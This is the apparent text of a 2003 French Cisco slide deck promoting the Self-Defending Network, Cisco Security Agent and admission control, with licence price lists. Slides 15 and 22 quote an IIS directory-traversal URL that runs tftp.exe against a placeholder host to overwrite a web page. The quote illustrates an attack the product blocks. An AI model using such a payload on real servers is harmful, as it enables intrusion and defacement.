Cisco Self Defending Network

Les réseaux capables de se défendre

tout seul

© 2003 Cisco Systems, Inc. All rights reserved. 1

Réseaux des années 90s

FR

X.25

LS

ATM

© 2003 Cisco Systems, Inc. All rights reserved. 2

Réseaux des années 2000

Mobilité :
• Nouvelles méthodes
d’accès au réseau :
Accès VPN
Accès Wireless
• Besoins d’ouverture
des datacenters
• Généralisation de la
messagerie
électronique
• Généralisation des
technologies Web
• Généralisation d’OS
et d’applications
cibles privilégiées
d’attaques
© 2003 Cisco Systems, Inc. All rights reserved. 3
Nouvelles contraintes…
Problème
Vers Virus
- Dégats plus graves
- Propagation plus rapide
- Patches plus fréquents

On ne peut pas tout protéger

- PC des visiteurs/interimaires
- OS/Systemes non supportés

On ne connait pas tous les clients

- Clients non managés
- De plus en plus de terminaux
non sécurisés (PDA)

Isoler les éléments nocifs

- Systemes infectés
- etc.

© 2003 Cisco Systems, Inc. All rights reserved. 4

… Nouvelles solutions !
Problème Solution
Protéger les machines
- Protection “Day Zero”
Nouvelles attaques - Architecture sans MAJ
- Patchs automatiques

Créer des “ilots de sécurité” pour les éléments clé

Trop d’éléments à - Protection FW et IDS (Fermes de serveurs)
protéger - Déploiement des services réseau (résilience)
- Consolidations des Data Centers

Déployer un contrôle d’admission

- Valider l’elligibilité de la machine
Clients et OS inconnus - Isoler/Mise en quarantine des machines
non autorisées

Déployer IDS/IPS partout

Isoler les systèmes - Identifier les systèmes, minimiser les
infectés dommages, contrôler la propagation
- Corellation d’événements
© 2003 Cisco Systems, Inc. All rights reserved. 5
 Le Système de défense Cisco

PIX Security Appliance, IOS FW, Catalyst

Firewall 6500 FWSM

IDS Appliances, Catalyst IDS Module,

Network IDS Router IDS Module, IOS-IDS

Protection des points d’extrémité Cisco Security Agent (CSA)

Netflow, NBAR, CAR, Private Vlans, DHCP

Services réseau Snooping, Dynamic ARP Inspection,
ACLs, QoS features

Intelligent Investigation Cisco Threat Response (CTR)

Content Engines, Router Network

Content Security Modules

Device Managers, CiscoWorks VMS, ISC,

Security Management CiscoWorks SIMS
© 2003 Cisco Systems, Inc. All rights reserved. 6
L’approche de la sécurité doit changer !

Avant Maintenant

Proactive et
Reactive
automatisée
Produits Isolés Intégrée à
l’infrastructure
Produits spécialisés Intégrée aux
Systèmes d’extrémités

© 2003 Cisco Systems, Inc. All rights reserved. 7

Initiative Cisco Self-Defending Network

Durcissement Protection des Contrôle

du réseau systèmes de l’accès au
réseau

IOS CSA CNAC

© 2003 Cisco Systems, Inc. All rights reserved. 8

 Durcissement du réseau

ALARM

Durcissement
2001 De l’IOS Today

- Renforcement des accès administrateurs

- Protection anti Déni de Service
- Buffer overflow
- Dépassement de charge CPU
- Dépassement capacité mémoire

© 2003 Cisco Systems, Inc. All rights reserved. 9

 Contrôle de l’accès au réseau
Cisco Network Admission Control

1. Tentative de connexion d’un 2. Mise en 3. Confinement des

système d’extrémité non quarantaine infections
conforme
Station CAMPUS
Corporate Network

Cisco
Trust VLAN de Quarantaine
Agent

Objectif : Lier la sécurité du réseau (802.1x) à

la sécurité système

© 2003 Cisco Systems, Inc. All rights reserved. 10

Phasing de CNAC
Phase 1 Phase 2 Phase 3
Q2 CY04 2HCY04 TBD

Equipements Routeurs IOS Switches Produits de Sécurité

réseau 17xx – 72xx AP Wireless Concentrateurs VPN

Support de Windows Windows 2003 Téléphones IP

l’agent Cisco NT, 2000, XP Red Hat Linux Cisco Appliances
Trust Agent Solaris MAC OS, HPUX, AIX
Integration Editeurs Editeurs d’OS et de
Tous types
1/3 partie d’Anti Virus consoles de Mgmt

Protocoles Layer 3 Layer 2 HTTP/SSL?

utilisés EAP/UDP EAP/802.1x

Traitement des Liste d’exception, Politique Téléchargement

Stations sans règle unique différenciée d’Applet ?
réponse
Méthode de Layer 3 ACLs VLANs, 802.1X DHCP, QoS
Quarantine Layer 3 ACLs
PACLs
© 2003 Cisco Systems, Inc. All rights reserved. 11
Cisco Security Agent
Protection des systèmes (Serveurs et Desktop)

© 2003 Cisco Systems, Inc. All rights reserved. 12

 Evolution des attaques

Packet Forging/ Internet

Spoofing Worms
High Stealth
Diagnostics
DDOS Augmentation de
Back Sweepers
Doors la complexité des
Sniffers attaques
Exploiting Known
Vulnerabilities Hijacking
Sessions
Disabling
Self Replicating Audits
Code
Password
Cracking

Password
Guessing

Low 1980 1990 2000

© 2003 Cisco Systems, Inc. All rights reserved. 13

 Objectif de l’attaque :
corrompre les postes internes

Hacker Router A Router B Cible

mbehring

PC PC
« Innocents » Corrompus
© 2003 Cisco Systems, Inc. All rights reserved. 14
Les attaques traversent les firewalls !

Firewall Serverfarms

http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:\inetpub\wwwroot\default.htm

© 2003 Cisco Systems, Inc. All rights reserved. 15

Exemple : Code Red

© 2003 Cisco Systems, Inc. All rights reserved. 16

 Déroulement d’une attaque

T0 T1 T2 T3
Go ! Bingo !
Phase 1 : Localiser Phase 2 : Infecter Phase 3 : Paralyser
- Les accès persister
- Les systèmes multiplier

• Objectif de l’attaque :
Paralyser le système d’information
Frapper plus vite que la défense, plus vite que l’antivirus

© 2003 Cisco Systems, Inc. All rights reserved. 17

 Stratégie de défense antivirus
T1 – première infection T5 - Eradication
Totale

T1 T5

Prévention contre les attaques connues Réponse antivirus Restauration après infection

Information Prévention Notification Edition Scan Contrôle

sur la de l’attaque et De la Et Et Restauration
menace Assurance Signature Elimination Eradication

$ $$ $ $$ $$ $$$$ $$$$

© 2003 Cisco Systems, Inc. All rights reserved. 18

 La rapidité des attaques s’accélére !
Etendue
des
dommages

Secondes

Minutes
Agir plus vite !
Jours

Semaines

1980s 1990s Aujourd’hui Demain

© 2003 Cisco Systems, Inc. All rights reserved. 19
 Stratégie de Défense Cisco Security Agent
Cisco Security Agent

T1 T5
Agir à T0 : aucune infection possible !
Prévention contre les attaques connues Réponse antivirus Restauration après infection

Information Prévention Notification Edition Scan Contrôle

sur la de l’attaque et De la Et Et Restauration
menace Assurance Signature Elimination Eradication

$ $$ $ $$ $$ $$$$ $$$$

© 2003 Cisco Systems, Inc. All rights reserved. 20

Positionnement de CSA

© 2003 Cisco Systems, Inc. All rights reserved. 21

Cisco Security Agent

Cisco Security Agent

Firewall Serverfarms

Protection de l’OS
- Buffer Overflow
- Appels systèmes malveillants
Protection des fichiers systèmes
Protection des fichiers utilisateurs
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:\inetpub\wwwroot\default.htm

Alerte de l’administrateur

© 2003 Cisco Systems, Inc. All rights reserved. 22

 Durcissement du système
Observation comportementale

...
Web Email Web
Server Client Browser Contrôle des accès :
- Au Système de fichiers
System Call Interceptor CSA - A la base de registre
- Aux Objets COM
Host Operating System - Aux services HTTP
- A la mémoire
- De l’execution de code

Network Protocol Stack

CSA Contrôle d’intégrité sur
Network Interceptor
- Tout paquet entrant
- Tout paquet sortant

1 - Interdiction des opérations malicieuses

2 - Notification de l’usager et de l’administrateur
© 2003 Cisco Systems, Inc. All rights reserved. 23
CSA Fonctions de sécurité
• Durcissement de l’OS
Protection anti Syn-flood
Détection des paquets mal formés
Contrôle de la validité des services
résidents sur la machine
• Protection des ressources système
Contrôle des accès aux fichiers
Contrôle des accès au réseau
Contrôle des accès a la base de registre
Contrôle des accès aux composants com
• Contrôle des .exe
Protection contre les vers (email)
Protection contre l’exécution de fichiers
téléchargés (.exe, ActiveX)
© 2003 Cisco Systems, Inc. All rights reserved.
• Défense des Applications
Contrôle de l’exécution correcte du code
Contrôle des versions de fichiers
exécutables
Protection contre l’injection de code
Protection de la gestion mémoire
Protection anti buffer overflows (saturation
de mémoire de travail de la CPU)
Protection contre la capture de le frappe
clavier
• Surveillance de l’activité réseau
Lancement de sniffer pirate ou de
protocole non autorisé sur la machine
Scan réseau
Capture de log systèmes
24
Situation & Concurrence

• Système de Détection d’Intrusion (HIDS)

Détection des attaques avec remontée d’alerte
ISS et Symantec
Gartner, Network Computing: “HIDS est mort”
Pourquoi détecter seulement quand on peut protéger ?
• Firewall personnel
Filtrage applicatif
Zone Alarm (Checkpoint), Personal Firewall (Symantec)
• Systèmes de Protection d’Intrusion (HIPS)
Détection des attaques avec traitement immédiat et remontée d’alerte
Entercept (NAI), eTrust (CA), Harris, Argus, Sana

© 2003 Cisco Systems, Inc. All rights reserved. 25

 Différenciation de CSA

Firewall Host-based
Distribué IDS
CSA Conventionnel Conventionnel
Blocage d’attaques “Zero-day” X
Blocage des requêtes réseaux entrantes X X
Blocage des requêtes réseaux sortantes X X
Analyse de paquets - inspection d’état X X
Détection et blocage du scan de ports X X
Détection et blocage du DoS X X
Détection et blocage d’applications malicieuses X X
Blocage d’attaques Buffer Overflows connues X Détection
Blocage d’attaques Buffer Overflows non connues X
Prévention des modifications de fichiers systèmes X Détection
Vérouillage de l’Operating System X X

© 2003 Cisco Systems, Inc. All rights reserved. 26

 Différenciation de CSA

CSA Anti-Virus

Protection contre tout codes malicieux

Protection anti Virus / Vers connus X X
Protection anti Virus / Vers non connnus X
Scanning et détection de fichier corrompus X
Nettoyage des fichiers infectés X
Identification des Virus / Vers X
Pas d’update de signatures X
Fonctionnalité Firewall distribué X
Vérouillage de l’Operating System X
Corrélation d’évènements X

© 2003 Cisco Systems, Inc. All rights reserved. 27

Composition de l’offre

© 2003 Cisco Systems, Inc. All rights reserved. 28

 Architecture Cisco Security Agent
• Gestion centralisée des règles et des alertes – CSA
MC
• Agents Desktops
• Agents Serveurs
VMS
Pagger Agents Desktop
E-Mail
CSA
Management
Browser-based Center
Management GUI
Configuration
Reports, Events Policy updates

SNMP
Traps Agents Serveurs
Custom
Programs
Local
File
© 2003 Cisco Systems, Inc. All rights reserved. 29
CSA Starter Bundle

• CiscoWorks VPN/Security Management Solution

(VMS) Basic 2.2
• CiscoWorks Management Center for Cisco Security
Agents 4.01 (CMC)
• 1 agent CSA Serveur
• 10 agents CSA Desktop
• Les ajouts de licences en supplément

© 2003 Cisco Systems, Inc. All rights reserved. 30

Agents Serveurs

• Agent Windows
Windows 2000 Server and Advanced Server
Windows NT 4.0 Server and Enterprise Server (Service
Pack 5 or later)

• Agent Solaris
Solaris 8 Service Pack ARC architecture (64-bit kernel)

© 2003 Cisco Systems, Inc. All rights reserved. 31

Agent Desktop

• Windows uniquement
Windows NT 4 Workstation (Service Pack 5 or later)
Windows 2000 Professional
Windows XP Professional

© 2003 Cisco Systems, Inc. All rights reserved. 32

 CSA Management Center

Références Désignation Prix €

CSA-STARTER-K9= CSA Starter Bundle 2 700 €
CWVMS-2.2-UR-K9 VMS 2.2 WIN/SOL Unrestricted 17 996 €
CWVMS-2.2-UR-MR-K9 Minor Release update for VMS 2.X Unrestricted 896 €

© 2003 Cisco Systems, Inc. All rights reserved. 33

 Prix des licences Serveurs

Références Désignation Prix €

CSA-SRVR-K9= Agent CSA Serveur (Win + Sol), 1 Agent 1 755 €
CSA-B10-SRVR-K9 Agent CSA Serveur (Win + Sol), 10 Agent Bundle 17 199 €
CSA-B25-SRVR-K9 Agent CSA Serveur (Win + Sol), 25 Agent Bundle 40 365 €
CSA-B50-SRVR-K9 Agent CSA Serveur (Win + Sol), 50 Agent Bundle 75 465 €
CSA-B100-SRVR-K9 Agent CSA Serveur (Win + Sol), 100 Agent Bundle 143 910 €
CSA-B250-SRVR-K9 Agent CSA Serveur (Win + Sol), 250 Agent Bundle 351 000 €
CSA-B500-SRVR-K9 Agent CSA Serveur (Win + Sol), 500 Agent Bundle 684 450 €
CSA-B1000-SRVR-K9 Agent CSA Serveur (Win + Sol), 1000 Agent Bundle 1 228 500 €

© 2003 Cisco Systems, Inc. All rights reserved. 34

 Prix des licences Desktop

Références Désignation Prix €

CSA-B25-DTOP-K9 CSA Agent Desktop (Win + Sol), 25 Agent Bundle 1 913 €
CSA-B100-DTOP-K9 CSA Agent Desktop (Win + Sol), 100 Agent Bundle 7 421 €
CSA-B250-DTOP-K9 CSA Agent Desktop (Win + Sol), 250 Agent Bundle 17 213 €
CSA-B500-DTOP-K9 CSA Agent Desktop (Win + Sol), 500 Agent Bundle 31 748 €
CSA-B1000-DTOP-K9 CSA Agent Desktop (Win + Sol), 1000 Agent Bundle 57 375 €
CSA-B2500-DTOP-K9 CSA Agent Desktop, 2500 Agent Bundle 133 875 €
CSA-B5000-DTOP-K9 CSA Agent Desktop, 5000 Agent Bundle 240 975 €
CSA-B10000-DTOP-K9 CSA Agent Desktop, 10,000 Agent Bundle 420 750 €

© 2003 Cisco Systems, Inc. All rights reserved. 35

En résumé

© 2003 Cisco Systems, Inc. All rights reserved. 36

Productivité - Efficacité

• Défense préventive et non pas corrective

• Aucun effort d’analyse de log IDS. Aucun travail de filtrage de
log nécessaire
• Aucune mise à jour de signature nécessaire
• Facile et rapide à déployer (30 min)
• Industrialisable (10000 agents / serveur CSA MC)
• Gestion centralisée des règles de sécurité
• Gestion centralisée des alertes
• Corrélation d’alertes

© 2003 Cisco Systems, Inc. All rights reserved. 37

Politiques de sécurité paramétrables

• Exploitable sans aucun paramétrage

Fournit en standard avec un ensemble complet de règles de
sécurité couvrant 90 % des besoins de protection système
Agents pré-configurés selon certains usages types (IPTel par
exemple)
• Complètement paramétrable si besoin est
Verrouiller l’usage des applications
Définir et distribuer de nouvelles règles de sécurité
Rapidement adaptable à de nouveaux besoins applicatifs, sans
aucune mise à jour système (juste des règles)

© 2003 Cisco Systems, Inc. All rights reserved. 38

© 2003 Cisco Systems, Inc. All rights reserved. 39